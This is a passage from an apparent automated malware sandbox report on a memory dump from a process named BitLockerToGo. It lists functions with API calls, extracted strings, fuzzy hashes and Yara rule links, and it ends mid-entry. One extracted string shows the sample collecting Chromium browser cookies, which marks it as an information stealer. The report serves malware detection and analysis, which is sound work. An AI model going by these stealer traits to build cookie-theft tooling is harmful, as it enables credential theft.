                • Opcode Fuzzy Hash: 1b73541f5bcff43ebe26c7557c971eedb3bfbd08542f464fdd940f7d0dcb51aa
                • Instruction Fuzzy Hash: DFE032B97007008BD320DF28EC86912B7E5FB59318744282CE88ACB752D670E855CF20
                Function 00262BA6 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule
                APIs
                • GetUserDefaultUILanguage.KERNELBASE ref: 00262BC6
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: DefaultLanguageUser
                • String ID:
                • API String ID: 95929093-0
                • Opcode ID: 8a454d74741738155cb0d19fa001e1202456f4d5fb223d28f236dd25129abc6a
                • Instruction ID: a23a4351c2c757416f62161aa654582aa7199b99effe4e44ab69843a8413eceb
                • Opcode Fuzzy Hash: 8a454d74741738155cb0d19fa001e1202456f4d5fb223d28f236dd25129abc6a
                • Instruction Fuzzy Hash: E6E0D8BA124600CFC310EF78D94424A7BE2BBC8304F55852CD98847345D730B585CF81
                Function 002677D6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                Download Yara Rule
                APIs
                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 002677EA
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e6212235c42533e534e3f55510c78357616fbb52f896657a4a58cd93f7427da8
                • Instruction ID: e2f345403edde2fd88b1dee3d32429dfb8856c1b7bc8c8f46051b4d228cc93ae
                • Opcode Fuzzy Hash: e6212235c42533e534e3f55510c78357616fbb52f896657a4a58cd93f7427da8
                • Instruction Fuzzy Hash: 47D05E34253050EBEB684F01ECCDF033E3AEF86722F100158B50A052E5C2719852DB94

                Non-executed Functions

                Function 0025E4A0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 159clipboardCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: Clipboard$CloseDataLongOpenWindow
                • String ID: I$K$L$N$g$s$v$x$y$z${
                • API String ID: 1647500905-1390982499
                • Opcode ID: 5b2671d52fa55024691a7d91a08831ad2d0a9c7ed8278fe4180729310642b7da
                • Instruction ID: 08abe1bd9b4de8853e4e6d2e16e19482ea091a2a4be0fef779be49f09a20d314
                • Opcode Fuzzy Hash: 5b2671d52fa55024691a7d91a08831ad2d0a9c7ed8278fe4180729310642b7da
                • Instruction Fuzzy Hash: 6761AFB0518740CFCB21DF28D484706BFF0AF16314F158A98E8CA8B755E374E919CBA2
                Function 00253142 Relevance: 14.5, Strings: 11, Instructions: 776COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: "$"$-3%$<=$B^SH$R6%$SN^D$X6%$r4%$r:%$sTN_
                • API String ID: 0-2800417422
                • Opcode ID: 5628e7a806676944be39838006a2b713dc32e3cf4ee9c4e229b782865398c104
                • Instruction ID: 66f33e557e599cf38e22f8c38a517c1f92cfca69d434e919e2428c2cf163a2fe
                • Opcode Fuzzy Hash: 5628e7a806676944be39838006a2b713dc32e3cf4ee9c4e229b782865398c104
                • Instruction Fuzzy Hash: E7420F71A18381DFD714CF28D89071ABBE2AFC9355F048A2DE8998B391C730DE55CB46
                Function 00231E20 Relevance: 10.6, Strings: 8, Instructions: 594COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: .$.$0$[$false$null$true${
                • API String ID: 0-1639024219
                • Opcode ID: b9079f0b16895c5d9822c3946244a804a24db2dfac1b01e9219df41e17997089
                • Instruction ID: 5f941d33147e9a041018da65b965c7af8bf65f3da29059c9c864ec03ef622959
                • Opcode Fuzzy Hash: b9079f0b16895c5d9822c3946244a804a24db2dfac1b01e9219df41e17997089
                • Instruction Fuzzy Hash: 040215F4624306DBD7105F25EC45726BBE4AF50308F198538F9898B253EB75D938CB92
                Function 00254E6B Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: .(.#$119,$5 f$60&+$7C%$?2)$$f8 <
                • API String ID: 0-1608121542
                • Opcode ID: 4912b52f9251e12f83892cc01b378c24c790a5cda85dcb8ef813d24937b8a47e
                • Instruction ID: 0ed84e316e59a30713c350075ca57e21e88f6eeb904909b0b59d12304f97cf03
                • Opcode Fuzzy Hash: 4912b52f9251e12f83892cc01b378c24c790a5cda85dcb8ef813d24937b8a47e
                • Instruction Fuzzy Hash: 81E1A0B19183418FC318DF28C49176EFBE2ABD5304F148A2DE4D987392DB34E959CB86
                Function 002397D0 Relevance: 9.1, Strings: 7, Instructions: 325COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: !#$$#/`$+(/($Jz`T$bJMs$qv"<$uJr{
                • API String ID: 0-2180438874
                • Opcode ID: c53e36e70595c7d0e5fb1d0fab81e3dfdd3b06ab5c1a29d87aaf79f55a446548
                • Instruction ID: af08714d726a81cc75ab1e3e32b7430aacfa589829a900a4c662b7c815df71a1
                • Opcode Fuzzy Hash: c53e36e70595c7d0e5fb1d0fab81e3dfdd3b06ab5c1a29d87aaf79f55a446548
                • Instruction Fuzzy Hash: 13C176B05183818FD325CF19C4907ABFBE1BF8A304F188A5DE4D99B352C7749996CB92
                Function 00252C9D Relevance: 7.8, Strings: 6, Instructions: 333COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: (0%$/1%$L0%$\eg$b}$r4%
                • API String ID: 0-2575072577
                • Opcode ID: 8ff0ce2fdd40607b50829fe7d02bdee1b9694cae75a59221773a3d3773607f10
                • Instruction ID: 3fb1c278ec5c7a3df5318b9ff92ce3635d8df63c3719cbc40ca6ff816c62d1ee
                • Opcode Fuzzy Hash: 8ff0ce2fdd40607b50829fe7d02bdee1b9694cae75a59221773a3d3773607f10
                • Instruction Fuzzy Hash: 0AC184B1618341DFD324CF14D890B6BBBF2FB8A315F01892DE9898B291D771D959CB82
                Function 0024DBEE Relevance: 5.5, Strings: 4, Instructions: 476COMMON
                Download Yara Rule
                Strings
                • r$, xrefs: 0024E867
                • [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 0024DDDD
                • @u, xrefs: 0024DD47
                • "$, xrefs: 0024E116
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: "$$@u$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$r$
                • API String ID: 0-4224994035
                • Opcode ID: f7f879b7c95bc336678cd115ed19da1791bda40630b9a6ddbe4b0e661de92c6e
                • Instruction ID: 66c7158110720a67a9b0517313a49374910d45957682889baa1c0be302b71b68
                • Opcode Fuzzy Hash: f7f879b7c95bc336678cd115ed19da1791bda40630b9a6ddbe4b0e661de92c6e
                • Instruction Fuzzy Hash: 76F1E072618351CFD318CF28D89072AB7E2FF99304F19892CE4998B391D735D856CB82
                Function 0024FFB0 Relevance: 4.2, Strings: 3, Instructions: 420COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: WU$^B$_U
                • API String ID: 0-591993885
                • Opcode ID: f5cce98d37f9300e7232675f16e458f61ec7f157a326afb0bb40fa3bebe4f372
                • Instruction ID: 7330b716a9e14c8b909c787286d2290bc67e0d7df8109b3a719c76421c98b2cb
                • Opcode Fuzzy Hash: f5cce98d37f9300e7232675f16e458f61ec7f157a326afb0bb40fa3bebe4f372
                • Instruction Fuzzy Hash: 94E17D75620B02CFC324CF28C8D0A66B3F2FF49705B5989ADD8868B761D735E859CB54
                Function 00239510 Relevance: 4.0, Strings: 3, Instructions: 243COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: x$yc$|
                • API String ID: 0-2517623061
                • Opcode ID: 1634e6f8be28813485449604081cfeed78bd88990914e336d6a42798db564ad5
                • Instruction ID: 3f8565a13c153aca888d7caacbb08d66ca44aec4e4984e40c1dadd889378765f
                • Opcode Fuzzy Hash: 1634e6f8be28813485449604081cfeed78bd88990914e336d6a42798db564ad5
                • Instruction Fuzzy Hash: 7771BCB195D3928BD311CF29C55074AFFE2AFD6750F188A8CE4D42B295C37A9849CB82
                Function 0024ABB0 Relevance: 4.0, Strings: 3, Instructions: 203COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: LM$Th$Ub
                • API String ID: 0-1443290983
                • Opcode ID: 1e6ba5f1f27b63463106d93cea135fb217e2320985e0f007c3307df0bf4931a5
                • Instruction ID: 82cf9f45f9e0f6ac7ba1fb15939eef0201ea48ce20403f6703ac73285d822bce
                • Opcode Fuzzy Hash: 1e6ba5f1f27b63463106d93cea135fb217e2320985e0f007c3307df0bf4931a5
                • Instruction Fuzzy Hash: AC6120B05183429BC314CF28D49065BBBF1FF89358F008A1DF8E99B2A1E374D955CB86
                Function 00258087 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 339COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: #v
                • API String ID: 0-554117064
                • Opcode ID: 5f423d43b39f0339839e8aa4b71fbb7a5d232a437f3349af81528ee1282aa21a
                • Instruction ID: 04c62c158ac0bf780f5282c96b37b03bb714dd96254f42473673c391ba7521de
                • Opcode Fuzzy Hash: 5f423d43b39f0339839e8aa4b71fbb7a5d232a437f3349af81528ee1282aa21a
                • Instruction Fuzzy Hash: 38C148712107818BD328CF28C890776BBE2BF56315F18865CD8A79F7C1DB75A859CB48
                Function 00255BD0 Relevance: 3.0, Strings: 2, Instructions: 535COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: "$"
                • API String ID: 0-3758156766
                • Opcode ID: cda4f5acd26b871cbcca2202356b46d30e563c0f34db992341330c9d98c9f970
                • Instruction ID: 465a939ed3d7d32a429a604b766508d20c3200220c3df5645c57f01f0d750f83
                • Opcode Fuzzy Hash: cda4f5acd26b871cbcca2202356b46d30e563c0f34db992341330c9d98c9f970
                • Instruction Fuzzy Hash: C80213716287129FC714CE28C4A476FB7E5AB84311F58892DFC9A8B381D774DD1C8B8A
                Function 00233850 Relevance: 1.9, Strings: 1, Instructions: 673COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: _#
                • API String ID: 0-2071307381
                • Opcode ID: 5576d93de2284f43aa1d731a0ecdc1f23c15680e3d11c9a175b688618ee6cebb
                • Instruction ID: abeb114c01f4bc8392134c103d42ee1a18b235e2263fd4280aa94cf96923ed53
                • Opcode Fuzzy Hash: 5576d93de2284f43aa1d731a0ecdc1f23c15680e3d11c9a175b688618ee6cebb
                • Instruction Fuzzy Hash: 4E52ABB16187428FC725CF25C080667FBE2BF88314F188A6EE4DA87651D778FA56CB41
                Function 0025AD4D Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: String
                • String ID:
                • API String ID: 2568140703-0
                • Opcode ID: d9637dee86136349e50bec95eecfcfc9cba95c94a0ff4ee3551c9d291091e922
                • Instruction ID: 0718773e7586ac32a7199987cfaf7e76989689e9245b9bdd4e5f311b8d0a2826
                • Opcode Fuzzy Hash: d9637dee86136349e50bec95eecfcfc9cba95c94a0ff4ee3551c9d291091e922
                • Instruction Fuzzy Hash: 4D91B1B16052428FC304EF3CD492796BBE1FFA9305F15492CE48A8B395E731A864CB46
                Function 00236A40 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: ,
                • API String ID: 0-3772416878
                • Opcode ID: 3e48fb93da189c62b0e05bf7dbf58001b919ecc4b59bd6c036f71f8d2a52db2b
                • Instruction ID: 561164f4251015191a15f0278cebb30272d1e8c8728701b82b5f296edb5b0f1e
                • Opcode Fuzzy Hash: 3e48fb93da189c62b0e05bf7dbf58001b919ecc4b59bd6c036f71f8d2a52db2b
                • Instruction Fuzzy Hash: AEB13B71209386AFD315CF68C84465BFBE4AFA9304F448A5DF49897382D371DA28CB96
                Function 00233350 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: _#
                • API String ID: 0-2071307381
                • Opcode ID: d0804c45f23e18b3a38dd5b1ba2fc293b18eaab1db2388ba06dba68e56258075
                • Instruction ID: a595cca8c7bc2bdeb24abb9ad1e52e26d405010e8dd9664e5bb78cc431a19ee5
                • Opcode Fuzzy Hash: d0804c45f23e18b3a38dd5b1ba2fc293b18eaab1db2388ba06dba68e56258075
                • Instruction Fuzzy Hash: 3541E432B182624BCB14CE3DCC5027ABAD39FC5245F1EC679E8C9DB386E578DA105790
                Function 002400F1 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: D
                • API String ID: 0-2746444292
                • Opcode ID: 9d3bef12303775df3518319dda976acff0ea8c95714b4407b5f5ba98082eee63
                • Instruction ID: ab1a70f56a2e1bfa07745c57c187098ddaa135589b8505db59c5494c4eaf8bb6
                • Opcode Fuzzy Hash: 9d3bef12303775df3518319dda976acff0ea8c95714b4407b5f5ba98082eee63
                • Instruction Fuzzy Hash: BB6112B01183819FE324DF01D8A57ABBBF0FB86748F10590CE5C91B291D7B59845CF86
                Function 00267442 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: 6t(
                • API String ID: 0-2705413176
                • Opcode ID: 99cfc5d43baf08b33595eea13df153f84881922beadd4ca94d9dbb26b73c0388
                • Instruction ID: 2d3a1dcf7dd5e4aebd8aea3abb4a6043615d381a4092ff6037e167c668fd42a4
                • Opcode Fuzzy Hash: 99cfc5d43baf08b33595eea13df153f84881922beadd4ca94d9dbb26b73c0388
                • Instruction Fuzzy Hash: 33C012387846008B8308CE14E890872B3B6EB8E2007903228844ED3750C620E8818A25
                Function 0025302C Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: F0%
                • API String ID: 0-521456340
                • Opcode ID: 6bf818793fe7ea43f53efbba46ee7723104e850771b06cd9c4fe9d0b54174a70
                • Instruction ID: e663095ffd25bd98e5f607c14556ec2312047ed8442629279f906ada6d44062b
                • Opcode Fuzzy Hash: 6bf818793fe7ea43f53efbba46ee7723104e850771b06cd9c4fe9d0b54174a70
                • Instruction Fuzzy Hash: D7B092A0D159218285016A2028220BDA0295A0B25AF442020E40A62002AA28E22A498F
                Function 00238130 Relevance: .8, Instructions: 819COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 13b0dbc37ce5dd985f5196187134fc832c5ca2fd16ff455f0f4b77a56554114a
                • Instruction ID: 8e5056dbc79181b297d671aa51aaf0851e5e45d91c12de921f635b1b8886eee1
                • Opcode Fuzzy Hash: 13b0dbc37ce5dd985f5196187134fc832c5ca2fd16ff455f0f4b77a56554114a
                • Instruction Fuzzy Hash: 845205B16287128BC725DF1CD8802BAB3E1FFD4314F15492DE9C69B385DB35A865CB82
                Function 00231072 Relevance: .8, Instructions: 752COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6701004c874a998607f8c90a1ee46f1f533f7853715775656e75c825a51a4ac
                • Instruction ID: ae43f66217bc4b6b59366318c95a48fbf08e315fc2417ad8265e3e7235dc608f
                • Opcode Fuzzy Hash: a6701004c874a998607f8c90a1ee46f1f533f7853715775656e75c825a51a4ac
                • Instruction Fuzzy Hash: DF52233651C290DFDB408F38FA693667BE4BB4A302F49C8B9D5D4832A2D3B9C954CB51
                Function 00265F90 Relevance: .8, Instructions: 750COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 27eb6b1ab59a9bd93b79acd7978dc1ec68636393047082fe3443230a8fe15e01
                • Instruction ID: 21cf684180b05c54753e6a5f02d49a0bc7675c08565aac5eb43dafcda6d89d09
                • Opcode Fuzzy Hash: 27eb6b1ab59a9bd93b79acd7978dc1ec68636393047082fe3443230a8fe15e01
                • Instruction Fuzzy Hash: 9042E2B56183428FD714CF18C894B2ABBE6FFC4318F188A2DE4958B391D735E855CB92
                Function 002699C0 Relevance: .7, Instructions: 696COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b9adb391483e5d5fbcee3a82491cd67babeae1c66e1fa1634ee41824145e059
                • Instruction ID: 1b889e8ae511fc5bac140701d2a1f2844bcd92dc4f9e179a3e7636d7ebc57979
                • Opcode Fuzzy Hash: 9b9adb391483e5d5fbcee3a82491cd67babeae1c66e1fa1634ee41824145e059
                • Instruction Fuzzy Hash: A3321332A18652CFC714CF28D49465ABBF2FF8A304F1A896DE89997351C731ED91CB81
                Function 00234240 Relevance: .6, Instructions: 612COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80e89722e92610840e5d293fa9b68fed828d9a1d68404160044e842a9668256e
                • Instruction ID: 6633f40d434999083a14676efc85240ba2e07c1ff0ef1ccbe9e8afce25781d1a
                • Opcode Fuzzy Hash: 80e89722e92610840e5d293fa9b68fed828d9a1d68404160044e842a9668256e
                • Instruction Fuzzy Hash: 334243B0524B518FC368DF28C59066ABBE1FF55310FA08A6EE6978BB90D375F854CB10
                Function 00252052 Relevance: .6, Instructions: 585COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 012a25b2b8837a9f8b54d7ec27b3d7c69ca192a67525f2d31eed0e864a1e916b
                • Instruction ID: d7a564436d5bc6246d93b63ab4257a27b5770b8f45503e99adf5bae1239f4ed4
                • Opcode Fuzzy Hash: 012a25b2b8837a9f8b54d7ec27b3d7c69ca192a67525f2d31eed0e864a1e916b
                • Instruction Fuzzy Hash: 640222B1618342CFC718CF24D49166FB7E2AF9A305F08486DE8C687392E635D95DCB92
                Function 00236470 Relevance: .5, Instructions: 512COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b2a5755e2a59bbed780f8d4f3a0a68a16a3bd155a12886517b918d5d612f8f63
                • Instruction ID: 88f5cddcc6be876f806a954dba606627b76f52aae40b42b1ee4774d491513a30
                • Opcode Fuzzy Hash: b2a5755e2a59bbed780f8d4f3a0a68a16a3bd155a12886517b918d5d612f8f63
                • Instruction Fuzzy Hash: 3D02C3766083419FCB14CF29C88571BBBE6AFC9304F09886DF888CB352D675D855CB96
                Function 00269CE0 Relevance: .5, Instructions: 477COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 03b09ce9045f1b8077d3ceeb41a4b7681c88737f6c998fbbf5fa05c3a5fd5f0d
                • Instruction ID: 7728b7447b0236e195a8b41c5f372950874e4e3acb58f16cc323bd0fe0a73c54
                • Opcode Fuzzy Hash: 03b09ce9045f1b8077d3ceeb41a4b7681c88737f6c998fbbf5fa05c3a5fd5f0d
                • Instruction Fuzzy Hash: 1CF12135628652CFC724CF29D89465AFBF2FF8A304F19896DE89987351C731E991CB80
                Function 0026B270 Relevance: .3, Instructions: 315COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3124e0819a2085de69f70e902e192de122f5c6ed167216d3281c8f8f1617fff0
                • Instruction ID: 51d3482f2732dcc4fa86d1ff63745da6816f9762cb5691f12e0ef6602852c910
                • Opcode Fuzzy Hash: 3124e0819a2085de69f70e902e192de122f5c6ed167216d3281c8f8f1617fff0
                • Instruction Fuzzy Hash: 3CA1B4716143029BD725CF28C890A6FB7E2FF84704F55896CE88A8B351EB30DC95CB91
                Function 0026B5C0 Relevance: .3, Instructions: 313COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3029d97b47de93c534ad0e2e7f75eb7e45104ab41e8833860401a598dd74089
                • Instruction ID: d416b74d9d6218ddc159ee1dc4d045fe455af8aa9d56053da4fb57bb1f08e65f
                • Opcode Fuzzy Hash: d3029d97b47de93c534ad0e2e7f75eb7e45104ab41e8833860401a598dd74089
                • Instruction Fuzzy Hash: D3A1D172A243128BC716CF18C890A6AB3E6FF94754F19852CE9969B350D730ECA1CBD1
                Function 002586C4 Relevance: .3, Instructions: 309COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 213a3293fb712bfeb4d89947be2a45a76ef7a6a22d7f22ace4f7a6c71636ae3f
                • Instruction ID: 1446815572b18dd944728ad209efe5ed2352a14cd6f228159fa1bb72b82c7801
                • Opcode Fuzzy Hash: 213a3293fb712bfeb4d89947be2a45a76ef7a6a22d7f22ace4f7a6c71636ae3f
                • Instruction Fuzzy Hash: 91A1DE701147818FDB25CF29C0D4B22BBF1AF16305F18898DD8D69F786C7B9A819CB65
                Function 002586C7 Relevance: .3, Instructions: 286COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7479a205f0e3c677d06c9749efa991ccc7a6381667ca03fd99f67494d5b36b2c
                • Instruction ID: 72a01b1a3dd710a4f9c7e43b268c4d9d360d20b0a5add8155fb1c6848a2bbb21
                • Opcode Fuzzy Hash: 7479a205f0e3c677d06c9749efa991ccc7a6381667ca03fd99f67494d5b36b2c
                • Instruction Fuzzy Hash: AAA1BB701147818FDB288F24C494B22BBF1BF16305F18899DC8D69F786C7B9A819CBA5
                Function 00259BC7 Relevance: .2, Instructions: 247COMMON
                Download Yara Rule
                Memory Dump Source
